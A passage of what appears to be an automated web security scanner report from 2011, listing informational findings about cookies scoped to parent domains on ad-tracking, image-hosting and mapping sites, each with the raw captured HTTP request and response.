Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254912; domain=pubmatic.com; expires=Sun, 20-Apr-2014 05:03:13 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

17.104. http://img.securepaynet.net/image.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.securepaynet.net
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1
Host: img.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/
Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/
Set-Cookie: fb_pagecount=1; path=/
Set-Cookie: actioncount=; domain=.securepaynet.net; path=/
Set-Cookie: fb_actioncount=; path=/
Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/
Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/
Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/
Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/
Set-Cookie: traffic=; domain=.securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sun, 24 Apr 2011 12:42:13 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

17.105. http://img167.imageshack.us/img167/6361/06ls4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img167.imageshack.us
Path:   /img167/6361/06ls4.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img167/6361/06ls4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img167.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 924976
Last-Modified: Wed, 23 Aug 2006 09:56:56 GMT
X-Server-Name-And-Port: img211.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=bea29fd082ba49ca9dbf1c65e168a013; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....v.v.......4......................................................................................................    .......................................................................
...[SNIP]...

17.106. http://img262.imageshack.us/img262/3146/17ls3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img262.imageshack.us
Path:   /img262/3146/17ls3.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img262/3146/17ls3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img262.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 67776
Last-Modified: Sun, 06 Apr 2008 21:39:23 GMT
X-Server-Name-And-Port: img262.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=9c5e791d8287483a99eb3be054c25116; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......H.X.."..............................
...[SNIP]...

17.107. http://imp.constantcontact.com/imp/cmp.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.constantcontact.com
Path:   /imp/cmp.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/cmp.jsp?impcc=IMP_14302119028291151&o=http://img.constantcontact.com/lp/images/standard/spacer.gif HTTP/1.1
Host: imp.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 07 Sep 2007 15:01:23 GMT
ETag: "b95c5-2b-4398ce98736c0"
Accept-Ranges: bytes
Content-Length: 43
X-Powered-By:
Content-Type: image/gif
Cookie: "IMP_1430293015671252=21400210|IMP_14302119028250221=21609811|IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|"
IMPCC_COOKIE_NEW: IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|
IMPCC_COOKIE: IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028250221
Cookie: "IMP_14302119028289011=21610280|"
IMPCC_COOKIE_NEW:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028289011
Expires: Sun, 24 Apr 2011 15:30:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:30:20 GMT
Connection: close
Set-Cookie: impcc="IMP_14302119028291151=21727650|"; expires=Sat, 23-Jul-2011 15:30:20 GMT; path=/; domain=.constantcontact.com
Cookie: "IMP_14302119028291151=21727650|"
IMPCC_COOKIE_NEW:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028291151

GIF89a.............!.......,...........D..;

17.108. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:32:52 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 25-Apr-2012 00:32:52 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>

17.109. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=562283&t=2
Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 24 Apr 2011 04:08:32 GMT
Content-Length: 0


17.110. http://leadback.netseer.com/dsatserving2/servlet/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.netseer.com
Path:   /dsatserving2/servlet/log

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1
Host: leadback.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6FE9E355E2568F5F32FAD5F08891554D.dsat4; Path=/dsatserving2
Set-Cookie: netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Content-Type: image/png
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Length: 70

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

17.111. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kes:Q'TOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9?.JE/qX3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:03 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 12:31:03 GMT

GIF89a.............!.......,........@..L..;

17.112. http://maps.google.co.in/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.co.in
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?oe=utf-8&client=firefox-a&ie=UTF8&q=701+Concord+Ave+Cambridge,+MA+02138&fb=1&gl=in&hnear=&cid=0,0,5277742105129806573&ei=Alb_S-73KMeyrAePyonKDg&ved=0CBYQnwIwAA&hq=701+Concord+Ave+Cambridge,+MA+02138&source=embed&ll=42.408249,-71.147118&spn=0.126748,0.256462&z=12&iwloc=A&output=embed HTTP/1.1
Host: maps.google.co.in
Proxy-Connection: keep-alive
Referer: http://echomail.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1fb5bd1c5e16dcbd:TM=1303695022:LM=1303695022:S=5XtueIRbOYQ5BPsM; expires=Wed, 24-Apr-2013 01:30:22 GMT; path=/; domain=.google.co.in
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 137621

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="View maps and find local b
...[SNIP]...

17.113. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&key=ABQIAAAAKxr92Gm_sSdbyYjdfIohNBS56gaUdzSHikA3rZ4TSkI7F88_jRTbY3PI3cfvlE9j9NeJo1pguo933w HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=555de6bc41a867ca:TM=1303663589:LM=1303663589:S=L93IJxO821-Gt4oS; expires=Tue, 23-Apr-2013 16:46:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:46:29 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Sun, 24 Apr 2011 16:46:29 GMT
Content-Length: 10192

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

17.114. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/vp?spn=0,0&z=0&key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA&mapclient=jsapi&vp=32.802113,-96.81313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:08:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=b39a2ada5444a96c:TM=1303675695:LM=1303675695:S=0f9paHWNl-6dIIAm; expires=Tue, 23-Apr-2013 20:08:15 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=gD4l26ZNya8U_3fqii8vnOrTfkCU8RRH2dCn1Q6L6dRupR6WdRSE6FCGZ5U7rJbVbdEcHO3hFoUAZpBx6De3hmSxhaesN3dtTJBPnHQuuz9SbFTHyGMkx80Lsle-O2tC; expires=Mon, 24-Oct-2011 20:08:15 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 604

window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:32787275,w:-96833496,n:32805745,e:-96811523,ix:-1}]}
,traffic:{bounds:[{s:29974000,w:-125485840,n:49200000,e:-82342500,ix:0},{s:32167236,w:-9
...[SNIP]...

17.115. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746

Response

HTTP/1.1 302 Redirect
Date: Sun, 24 Apr 2011 03:08:32 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=RSh3CL6z3gEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: pluto=728800512746; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT


17.116. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /b/ss/prod/1/H.22.1/s0465555016417

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/prod/1/H.22.1/s0465555016417?AQB=1&ndh=1&t=24%2F3%2F2011%2014%3A44%3A23%200%20300&g=http%3A%2F%2Fwww.identitymonitor.citi.com%2F&cc=USD&ch=CARDSPublic&c1=Teleformix&h1=CARDSPublic%2FTeleformix%2FIdentityMonitor&c2=IdentityMonitor&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:46:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3EFF851D3CA9-4000010840236C3F[CE]; Expires=Fri, 22 Apr 2016 19:46:07 GMT; Domain=.citibank.com; Path=/
Location: http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417?AQB=1&pccr=true&vidn=26DA3EFF851D3CA9-4000010840236C3F&&ndh=1&t=24%2F3%2F2011%2014%3A44%3A23%200%20300&g=http%3A%2F%2Fwww.identitymonitor.citi.com%2F&cc=USD&ch=CARDSPublic&c1=Teleformix&h1=CARDSPublic%2FTeleformix%2FIdentityMonitor&c2=IdentityMonitor&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:46:07 GMT
Last-Modified: Mon, 25 Apr 2011 19:46:07 GMT
